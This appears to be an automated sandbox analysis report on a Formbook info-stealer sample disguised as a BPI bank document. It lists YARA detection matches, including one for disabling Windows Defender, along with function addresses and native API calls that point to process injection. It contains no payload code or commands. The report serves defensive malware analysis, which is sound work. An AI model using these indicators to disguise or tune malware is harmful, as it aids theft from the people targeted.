          Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Document de bancobpi_66473474.exe
          Source: Document de bancobpi_66473474.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Document de bancobpi_66473474.exe.4568448.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
          Source: 0.2.Document de bancobpi_66473474.exe.4568448.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011DC6180_2_011DC618
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011D08700_2_011D0870
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011D07B00_2_011D07B0
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeCode function: 0_2_011DEF200_2_011DEF20
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041F16E6_2_0041F16E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041E9C86_2_0041E9C8
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0040927C6_2_0040927C
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_004012FB6_2_004012FB
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_004092806_2_00409280
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041DBD26_2_0041DBD2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0040DC206_2_0040DC20
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041ED4A6_2_0041ED4A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D841F6_2_049D841F
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8D4666_2_04A8D466
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F25816_2_049F2581
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A925DD6_2_04A925DD
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DD5E06_2_049DD5E0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A92D076_2_04A92D07
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C0D206_2_049C0D20
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A91D556_2_04A91D55
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A92EF76_2_04A92EF7
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E6E306_2_049E6E30
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A91FF16_2_04A91FF1
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A920A86_2_04A920A8
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DB0906_2_049DB090
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A06_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A928EC6_2_04A928EC
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A810026_2_04A81002
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CF9006_2_049CF900
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E41206_2_049E4120
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A922AE6_2_04A922AE
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FEBB06_2_049FEBB0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8DBD26_2_04A8DBD2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A92B286_2_04A92B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E4D46615_2_04E4D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9841F15_2_04D9841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E525DD15_2_04E525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9D5E015_2_04D9D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB258115_2_04DB2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E51D5515_2_04E51D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E52D0715_2_04E52D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D80D2015_2_04D80D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E52EF715_2_04E52EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA6E3015_2_04DA6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E4D61615_2_04E4D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E51FF115_2_04E51FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E528EC15_2_04E528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9B09015_2_04D9B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E520A815_2_04E520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A015_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E4100215_2_04E41002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8F90015_2_04D8F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA412015_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E522AE15_2_04E522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E4DBD215_2_04E4DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBEBB015_2_04DBEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E52B2815_2_04E52B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8E9C815_2_00E8E9C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8F16E15_2_00E8F16E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E7928015_2_00E79280
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E7927C15_2_00E7927C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8DBCD15_2_00E8DBCD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E7DC2015_2_00E7DC20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E72D8715_2_00E72D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E72D9015_2_00E72D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E8ED4A15_2_00E8ED4A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00E72FB015_2_00E72FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04D8B150 appears 35 times
          Source: C:\Windows\SysWOW64\setup16.exeCode function: String function: 049CB150 appears 35 times
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A310 NtCreateFile,6_2_0041A310
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A3C0 NtReadFile,6_2_0041A3C0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A440 NtClose,6_2_0041A440
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A4F0 NtAllocateVirtualMemory,6_2_0041A4F0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A30A NtCreateFile,6_2_0041A30A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A3BB NtCreateFile,6_2_0041A3BB
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_0041A43A NtClose,6_2_0041A43A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A095D0 NtClose,LdrInitializeThunk,6_2_04A095D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09540 NtReadFile,LdrInitializeThunk,6_2_04A09540
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A096E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04A096E0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04A09660
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A097A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04A097A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09780 NtMapViewOfSection,LdrInitializeThunk,6_2_04A09780
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09FE0 NtCreateMutant,LdrInitializeThunk,6_2_04A09FE0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09710 NtQueryInformationToken,LdrInitializeThunk,6_2_04A09710
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A098F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_04A098F0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04A09860
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09840 NtDelayExecution,LdrInitializeThunk,6_2_04A09840
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A099A0 NtCreateSection,LdrInitializeThunk,6_2_04A099A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04A09910
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09A20 NtResumeThread,LdrInitializeThunk,6_2_04A09A20
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_04A09A00
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09A50 NtCreateFile,LdrInitializeThunk,6_2_04A09A50
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A095F0 NtQueryInformationFile,6_2_04A095F0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09520 NtWaitForSingleObject,6_2_04A09520
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A0AD30 NtSetContextThread,6_2_04A0AD30
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09560 NtWriteFile,6_2_04A09560
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A096D0 NtCreateKey,6_2_04A096D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A09610 NtEnumerateValueKey,6_2_04A09610
